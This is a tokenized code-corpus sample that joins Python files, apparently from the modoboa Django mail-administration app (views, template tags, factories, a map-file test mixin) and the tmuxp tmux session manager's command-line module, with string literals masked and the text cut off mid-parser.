domadmin_actions ( daid , domid ) : <EOL> actions = [ { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , domid , daid ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" ) <EOL> } ] <EOL> return render_actions ( actions ) <EOL> @ register . filter <EOL> def gender ( value , target ) : <EOL> if value in genders : <EOL> trans = target == "<STR_LIT:m>" and genders [ value ] [ <NUM_LIT:0> ] or genders [ value ] [ <NUM_LIT:1> ] <EOL> if trans . find ( "<STR_LIT:_>" ) == - <NUM_LIT:1> : <EOL> return trans <EOL> return value <EOL> @ register . simple_tag <EOL> def get_extra_admin_content ( user , target , currentpage ) : <EOL> res = events . raiseQueryEvent ( <EOL> "<STR_LIT>" , user , target , currentpage <EOL> ) <EOL> return mark_safe ( "<STR_LIT>" . join ( res ) ) </s>
<s> """<STR_LIT>""" <EOL> from modoboa . lib import events , parameters <EOL> def top_notifications ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . is_anonymous ( ) : <EOL> return { } <EOL> return { <EOL> "<STR_LIT>" : <EOL> int ( parameters . get_admin ( "<STR_LIT>" ) ) * <NUM_LIT:1000> , <EOL> "<STR_LIT>" : events . raiseQueryEvent ( <EOL> "<STR_LIT>" , request , False ) <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import render <EOL> from django . utils import translation <EOL> from django . utils . translation import ugettext as _ <EOL> from django . contrib . auth . decorators import login_required , user_passes_test <EOL> from rest_framework . authtoken . models import Token <EOL> from modoboa . lib import events , parameters <EOL> from modoboa . lib . cryptutils import encrypt <EOL> from modoboa . lib . web_utils import ( <EOL> _render_to_string , render_to_json_response <EOL> ) <EOL> from . . forms import ProfileForm , APIAccessForm <EOL> @ login_required <EOL> def index ( request , tplname = "<STR_LIT>" ) : <EOL> extrajs = events . raiseQueryEvent ( "<STR_LIT>" , request . user ) <EOL> return render ( request , tplname , { <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" . join ( extrajs ) <EOL> } ) <EOL> @ login_required <EOL> def profile ( request , tplname = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> update_password = True <EOL> if True in events . raiseQueryEvent ( "<STR_LIT>" , request . user ) : <EOL> update_password = False <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = ProfileForm ( <EOL> update_password , request . POST , instance = request . user <EOL> ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> if update_password and form . cleaned_data [ "<STR_LIT>" ] != "<STR_LIT>" : <EOL> request . session [ "<STR_LIT:password>" ] = encrypt ( <EOL> form . cleaned_data [ "<STR_LIT>" ] ) <EOL> translation . activate ( request . user . language ) <EOL> request . session [ translation . LANGUAGE_SESSION_KEY ] = ( <EOL> request . user . language ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( <EOL> { '<STR_LIT>' : form . errors } , status = <NUM_LIT> ) <EOL> form = ProfileForm ( update_password , instance = request . user ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( request , tplname , { <EOL> "<STR_LIT>" : form <EOL> } ) <EOL> } ) <EOL> @ login_required <EOL> def preferences ( request ) : <EOL> if request . method == "<STR_LIT:POST>" : <EOL> for formdef in parameters . get_user_forms ( request . user , request . POST ) : <EOL> form = formdef [ "<STR_LIT>" ] <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> continue <EOL> return render_to_json_response ( { <EOL> "<STR_LIT>" : form . app , "<STR_LIT>" : form . errors <EOL> } , status = <NUM_LIT> ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( request , "<STR_LIT>" , { <EOL> "<STR_LIT>" : parameters . get_user_forms ( request . user ) <EOL> } ) <EOL> } ) <EOL> @ login_required <EOL> @ user_passes_test ( lambda u : u . is_superuser ) <EOL> def api_access ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = APIAccessForm ( request . POST , user = request . user ) <EOL> if form . is_valid ( ) : <EOL> if form . cleaned_data . get ( "<STR_LIT>" ) : <EOL> Token . objects . get_or_create ( user = request . user ) <EOL> else : <EOL> Token . objects . filter ( user = request . user ) . delete ( ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT>" : form . errors <EOL> } , status = <NUM_LIT> ) <EOL> form = APIAccessForm ( user = request . user ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( <EOL> request , "<STR_LIT>" , { "<STR_LIT>" : form } ) <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> from . sysutils import exec_cmd <EOL> class MapFilesTestCaseMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> MAP_FILES = None <EOL> extension = None <EOL> def setUp ( self ) : <EOL> self . workdir = tempfile . mkdtemp ( ) <EOL> def tearDown ( self ) : <EOL> exec_cmd ( "<STR_LIT>" . format ( self . workdir ) ) <EOL> def _test_maps_generation ( self , engine ) : <EOL> dburl = "<STR_LIT>" . format ( engine ) <EOL> code , output = exec_cmd ( <EOL> "<STR_LIT>" . format ( <EOL> "<STR_LIT>" . format ( self . extension ) <EOL> if self . extension else "<STR_LIT>" , dburl , self . workdir <EOL> ) <EOL> ) <EOL> self . assertEqual ( code , <NUM_LIT:0> ) <EOL> for mapfile in self . MAP_FILES : <EOL> path = "<STR_LIT>" . format ( self . workdir , mapfile ) <EOL> self . assertTrue ( os . path . exists ( path ) ) <EOL> with open ( path ) as fpo : <EOL> content = fpo . read ( ) <EOL> if engine != "<STR_LIT>" : <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> else : <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> def test_postgres_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) <EOL> def test_mysql_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) <EOL> def test_sqlite_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import factory <EOL> from modoboa . admin . factories import DomainFactory <EOL> from modoboa . core . factories import PermissionFactory <EOL> from . import models <EOL> class ServiceFactory ( factory . DjangoModelFactory ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = models . Service <EOL> django_get_or_create = ( '<STR_LIT:name>' , ) <EOL> name = '<STR_LIT>' <EOL> class RelayDomainFactory ( PermissionFactory ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = models . RelayDomain <EOL> domain = factory . SubFactory ( DomainFactory ) <EOL> target_host = '<STR_LIT>' <EOL> verify_recipients = True <EOL> service = factory . SubFactory ( ServiceFactory ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement , unicode_literals <EOL> import argparse <EOL> import logging <EOL> import os <EOL> import sys <EOL> import argcomplete <EOL> import kaptan <EOL> from . import log , util , exc , WorkspaceBuilder , Server , config <EOL> from . __about__ import __version__ <EOL> from . _compat import input , string_types <EOL> from . workspacebuilder import freeze <EOL> logger = logging . getLogger ( __name__ ) <EOL> config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> cwd_dir = os . getcwd ( ) + '<STR_LIT:/>' <EOL> tmuxinator_config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> teamocil_config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> def prompt ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> prompt = name + ( default and '<STR_LIT>' % default or '<STR_LIT>' ) <EOL> prompt += name . endswith ( '<STR_LIT:?>' ) and '<STR_LIT:U+0020>' or '<STR_LIT>' <EOL> while True : <EOL> rv = input ( prompt ) <EOL> if rv : <EOL> return rv <EOL> if default is not None : <EOL> return default <EOL> def prompt_bool ( name , default = False , yes_choices = None , no_choices = None ) : <EOL> """<STR_LIT>""" <EOL> yes_choices = yes_choices or ( '<STR_LIT:y>' , '<STR_LIT:yes>' , '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:true>' , '<STR_LIT:t>' ) <EOL> no_choices = no_choices or ( '<STR_LIT:n>' , '<STR_LIT>' , '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT:false>' , '<STR_LIT:f>' ) <EOL> if default is None : <EOL> prompt_choice = '<STR_LIT>' <EOL> elif default is True : <EOL> prompt_choice = '<STR_LIT>' <EOL> else : <EOL> prompt_choice = '<STR_LIT>' <EOL> prompt = name + '<STR_LIT>' % prompt_choice <EOL> prompt += name . endswith ( '<STR_LIT:?>' ) and '<STR_LIT:U+0020>' or '<STR_LIT>' <EOL> while True : <EOL> rv = input ( prompt ) <EOL> if not rv : <EOL> return default <EOL> if rv . lower ( ) in yes_choices : <EOL> return True <EOL> elif rv . lower ( ) in no_choices : <EOL> return False <EOL> def prompt_yes_no ( name , default = True ) : <EOL> """<STR_LIT>""" <EOL> return prompt_bool ( name , default = default ) <EOL> def prompt_choices ( name , choices , default = None , no_choice = ( '<STR_LIT:none>' , ) ) : <EOL> """<STR_LIT>""" <EOL> _choices = [ ] <EOL> options = [ ] <EOL> for choice in choices : <EOL> if isinstance ( choice , string_types ) : <EOL> options . append ( choice ) <EOL> else : <EOL> options . append ( "<STR_LIT>" % ( choice , choice [ <NUM_LIT:0> ] ) ) <EOL> choice = choice [ <NUM_LIT:0> ] <EOL> _choices . append ( choice ) <EOL> while True : <EOL> rv = prompt ( name + '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( options ) , default ) <EOL> if not rv : <EOL> return default <EOL> rv = rv . lower ( ) <EOL> if rv in no_choice : <EOL> return None <EOL> if rv in _choices : <EOL> return rv <EOL> class ConfigFileCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> completion += [ os . path . join ( config_dir , c ) <EOL> for c in config . in_dir ( config_dir ) ] <EOL> return completion <EOL> class TmuxinatorCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> tmuxinator_configs = config . in_dir ( <EOL> tmuxinator_config_dir , extensions = '<STR_LIT>' <EOL> ) <EOL> completion += [ <EOL> os . path . join ( tmuxinator_config_dir , f ) <EOL> for f in tmuxinator_configs <EOL> ] <EOL> return completion <EOL> class TeamocilCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> teamocil_configs = config . in_dir ( teamocil_config_dir , extensions = '<STR_LIT>' ) <EOL> completion += [ <EOL> os . path . join ( teamocil_config_dir , f ) <EOL> for f in teamocil_configs <EOL> ] <EOL> return completion <EOL> def SessionCompleter ( prefix , parsed_args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> t = Server ( <EOL> socket_name = parsed_args . socket_name , <EOL> socket_path = parsed_args . socket_path <EOL> ) <EOL> sessions_available = [ <EOL> s . get ( '<STR_LIT>' ) for s in t . _sessions <EOL> if s . get ( '<STR_LIT>' ) . startswith ( '<STR_LIT:U+0020>' . join ( prefix ) ) <EOL> ] <EOL> if parsed_args . session_name and sessions_available : <EOL> return [ ] <EOL> return [ <EOL> s . get ( '<STR_LIT>' ) for s in t . _sessions <EOL> if s . get ( '<STR_LIT>' ) . startswith ( prefix ) <EOL> ] <EOL> def setup_logger ( logger = None , level = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not logger : <EOL> logger = logging . getLogger ( ) <EOL> if not logger . handlers : <EOL> channel = logging . StreamHandler ( ) <EOL> channel . setFormatter ( log . DebugLogFormatter ( ) ) <EOL> logger . setLevel ( level ) <EOL> logger . addHandler ( channel ) <EOL> def startup ( config_dir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( config_dir ) : <EOL> os . makedirs ( config_dir ) <EOL> def load_workspace ( config_file , args ) : <EOL> """<STR_LIT>""" <EOL> sconfig = kaptan . Kaptan ( ) <EOL> sconfig = sconfig . import_config ( config_file ) . get ( ) <EOL> sconfig = config . expand ( sconfig , os . path . dirname ( config_file ) ) <EOL> sconfig = config . trickle ( sconfig ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> builder = WorkspaceBuilder ( sconf = sconfig , server = t ) <EOL> except exc . EmptyConfigException : <EOL> logger . error ( '<STR_LIT>' % config_file ) <EOL> return <EOL> tmux_bin = util . which ( '<STR_LIT>' ) <EOL> try : <EOL> logger . info ( '<STR_LIT>' % config_file ) <EOL> builder . build ( ) <EOL> if '<STR_LIT>' in os . environ : <EOL> if not args . detached and ( args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) ) : <EOL> tmux_env = os . environ . pop ( '<STR_LIT>' ) <EOL> builder . session . switch_client ( ) <EOL> os . environ [ '<STR_LIT>' ] = tmux_env <EOL> return <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if not args . detached : <EOL> builder . session . attach_session ( ) <EOL> except exc . TmuxSessionExists as e : <EOL> if not args . detached and ( <EOL> args . answer_yes or prompt_yes_no ( '<STR_LIT>' % e ) <EOL> ) : <EOL> if '<STR_LIT>' in os . environ : <EOL> builder . session . switch_client ( ) <EOL> else : <EOL> builder . session . attach_session ( ) <EOL> return <EOL> except exc . TmuxpException as e : <EOL> import traceback <EOL> print ( traceback . format_exc ( ) ) <EOL> logger . error ( e ) <EOL> choice = prompt_choices ( <EOL> '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:k>' , '<STR_LIT:a>' , '<STR_LIT:d>' ] , <EOL> default = '<STR_LIT:k>' <EOL> ) <EOL> if choice == '<STR_LIT:k>' : <EOL> builder . session . kill_session ( ) <EOL> print ( '<STR_LIT>' ) <EOL> elif choice == '<STR_LIT:a>' : <EOL> if '<STR_LIT>' in os . environ : <EOL> builder . session . switch_client ( ) <EOL> else : <EOL> builder . session . attach_session ( ) <EOL> else : <EOL> sys . exit ( ) <EOL> def command_freeze ( args ) : <EOL> """<STR_LIT>""" <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> session = t . findWhere ( { <EOL> '<STR_LIT>' : ctext <EOL> } ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> sconf = freeze ( session ) <EOL> configparser = kaptan . Kaptan ( ) <EOL> newconfig = config . inline ( sconf ) <EOL> configparser . import_config ( newconfig ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False , safe = True <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> save_to = os . path . abspath ( <EOL> os . path . join ( <EOL> config_dir , <EOL> '<STR_LIT>' % ( sconf . get ( '<STR_LIT>' ) , config_format ) <EOL> ) <EOL> ) <EOL> dest_prompt = prompt ( '<STR_LIT>' , save_to ) <EOL> if os . path . exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> destdir = os . path . dirname ( dest ) <EOL> if not os . path . isdir ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_load ( args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( args . config , list ) : <EOL> for cfg in args . config [ : - <NUM_LIT:1> ] : <EOL> new_args = argparse . Namespace ( ** args . __dict__ ) <EOL> new_args . detached = True <EOL> new_args . config = cfg <EOL> command_load ( new_args ) <EOL> new_args = argparse . Namespace ( ** args . __dict__ ) <EOL> new_args . config = args . config [ - <NUM_LIT:1> ] <EOL> command_load ( new_args ) <EOL> return <EOL> if '<STR_LIT:.>' == args . config : <EOL> if config . in_cwd ( ) : <EOL> configfile = config . in_cwd ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> else : <EOL> configfile = args . config <EOL> file_user = os . path . join ( config_dir , configfile ) <EOL> file_cwd = os . path . join ( cwd_dir , configfile ) <EOL> if os . path . exists ( file_cwd ) and os . path . isfile ( file_cwd ) : <EOL> print ( '<STR_LIT>' % file_cwd ) <EOL> load_workspace ( file_cwd , args ) <EOL> elif os . path . exists ( file_user ) and os . path . isfile ( file_user ) : <EOL> load_workspace ( file_user , args ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % configfile ) <EOL> def command_import_teamocil ( args ) : <EOL> """<STR_LIT>""" <EOL> if args . list : <EOL> try : <EOL> configs_in_user = config . in_dir ( <EOL> teamocil_config_dir , extensions = '<STR_LIT>' ) <EOL> except OSError : <EOL> configs_in_user = [ ] <EOL> configs_in_cwd = config . in_dir ( <EOL> config_dir = cwd_dir , extensions = '<STR_LIT>' ) <EOL> output = '<STR_LIT>' <EOL> if not os . path . exists ( teamocil_config_dir ) : <EOL> output += '<STR_LIT>' % teamocil_config_dir <EOL> elif not configs_in_user : <EOL> output += '<STR_LIT>' % teamocil_config_dir <EOL> else : <EOL> output += '<STR_LIT>' % ( <EOL> config_dir , '<STR_LIT:U+002CU+0020>' . join ( configs_in_user ) <EOL> ) <EOL> if configs_in_cwd : <EOL> output += '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( configs_in_cwd ) <EOL> ) <EOL> print ( output ) <EOL> elif args . config : <EOL> configfile = os . path . abspath ( os . path . relpath ( <EOL> os . path . expanduser ( args . config ) ) ) <EOL> configparser = kaptan . Kaptan ( handler = '<STR_LIT>' ) <EOL> if os . path . exists ( configfile ) : <EOL> print ( configfile ) <EOL> configparser . import_config ( configfile ) <EOL> newconfig = config . import_teamocil ( configparser . get ( ) ) <EOL> configparser . import_config ( newconfig ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' % configfile ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> dest_prompt = prompt ( '<STR_LIT>' , os . path . abspath ( <EOL> os . path . join ( config_dir , '<STR_LIT>' % config_format ) ) ) <EOL> if os . path . exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_import_tmuxinator ( args ) : <EOL> """<STR_LIT>""" <EOL> if args . list : <EOL> try : <EOL> configs_in_user = config . in_dir ( <EOL> tmuxinator_config_dir , extensions = '<STR_LIT>' ) <EOL> except OSError : <EOL> configs_in_user = [ ] <EOL> configs_in_cwd = config . in_dir ( <EOL> config_dir = cwd_dir , extensions = '<STR_LIT>' ) <EOL> output = '<STR_LIT>' <EOL> if not os . path . exists ( tmuxinator_config_dir ) : <EOL> output += '<STR_LIT>' % tmuxinator_config_dir <EOL> elif not configs_in_user : <EOL> output += '<STR_LIT>' % tmuxinator_config_dir <EOL> else : <EOL> output += '<STR_LIT>' % ( <EOL> config_dir , '<STR_LIT:U+002CU+0020>' . join ( configs_in_user ) <EOL> ) <EOL> if configs_in_cwd : <EOL> output += '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( configs_in_cwd ) <EOL> ) <EOL> print ( output ) <EOL> if args . config : <EOL> configfile = os . path . abspath ( os . path . relpath ( <EOL> os . path . expanduser ( args . config ) ) ) <EOL> configparser = kaptan . Kaptan ( handler = '<STR_LIT>' ) <EOL> if os . path . exists ( configfile ) : <EOL> print ( configfile ) <EOL> configparser . import_config ( configfile ) <EOL> newconfig = config . import_tmuxinator ( configparser . get ( ) ) <EOL> configparser . import_config ( newconfig ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' % configfile ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> dest_prompt = prompt ( '<STR_LIT>' , os . path . abspath ( <EOL> os . path . join ( config_dir , '<STR_LIT>' % config_format ) ) ) <EOL> if os . path . exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_convert ( args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> configfile = args . config <EOL> except exc . TmuxpException : <EOL> print ( '<STR_LIT>' ) <EOL> file_user = os . path . join ( config_dir , configfile ) <EOL> file_cwd = os . path . join ( cwd_dir , configfile ) <EOL> if os . path . exists ( file_cwd ) and os . path . isfile ( file_cwd ) : <EOL> fullfile = os . path . normpath ( file_cwd ) <EOL> filename , ext = os . path . splitext ( file_cwd ) <EOL> elif os . path . exists ( file_user ) and os . path . isfile ( file_user ) : <EOL> fullfile = os . path . normpath ( file_user ) <EOL> filename , ext = os . path . splitext ( file_user ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % configfile ) <EOL> return <EOL> if '<STR_LIT>' in ext : <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( fullfile ) <EOL> ) : <EOL> configparser = kaptan . Kaptan ( ) <EOL> configparser . import_config ( configfile ) <EOL> newfile = fullfile . replace ( ext , '<STR_LIT>' ) <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( newfile ) <EOL> ) : <EOL> buf = open ( newfile , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % ( newfile ) ) <EOL> elif '<STR_LIT>' in ext : <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( fullfile ) <EOL> ) : <EOL> configparser = kaptan . Kaptan ( ) <EOL> configparser . import_config ( configfile ) <EOL> newfile = fullfile . replace ( ext , '<STR_LIT>' ) <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> print ( newconfig ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( newfile ) <EOL> ) : <EOL> buf = open ( newfile , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % ( newfile ) ) <EOL> def command_attach_session ( args ) : <EOL> """<STR_LIT>""" <EOL> commands = [ ] <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> session = next ( ( s for s in t . sessions if s . get ( <EOL> '<STR_LIT>' ) == ctext ) , None ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> if '<STR_LIT>' in os . environ : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> session . switch_client ( ) <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> session . attach_session ( ) <EOL> print ( '<STR_LIT>' ) <EOL> def command_kill_session ( args ) : <EOL> """<STR_LIT>""" <EOL> commands = [ ] <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name or None , <EOL> socket_path = args . socket_path or None <EOL> ) <EOL> try : <EOL> session = next ( ( s for s in t . sessions if s . get ( <EOL> '<STR_LIT>' ) == ctext ) , None ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> try : <EOL> session . kill_session ( ) <EOL> print ( "<STR_LIT>" % ctext ) <EOL> except exc . TmuxpException as e : <EOL> logger . error ( e ) <EOL> def get_parser ( ) : <EOL> """<STR_LIT>""" <EOL> server_parser = argparse . ArgumentParser ( add_help = False ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' <EOL> ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' <EOL> ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' <EOL> ) <EOL> parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] <EOL> ) <EOL> client_parser = argparse . ArgumentParser ( add_help = False ) <EOL> colorsgroup = client_parser . add_mutually_exclusive_group ( ) <EOL> colorsgroup . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = <NUM_LIT> , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> colorsgroup . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = <NUM_LIT> , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . set_defaults ( colors = None ) <EOL> subparsers = parser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> kill_session = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] , 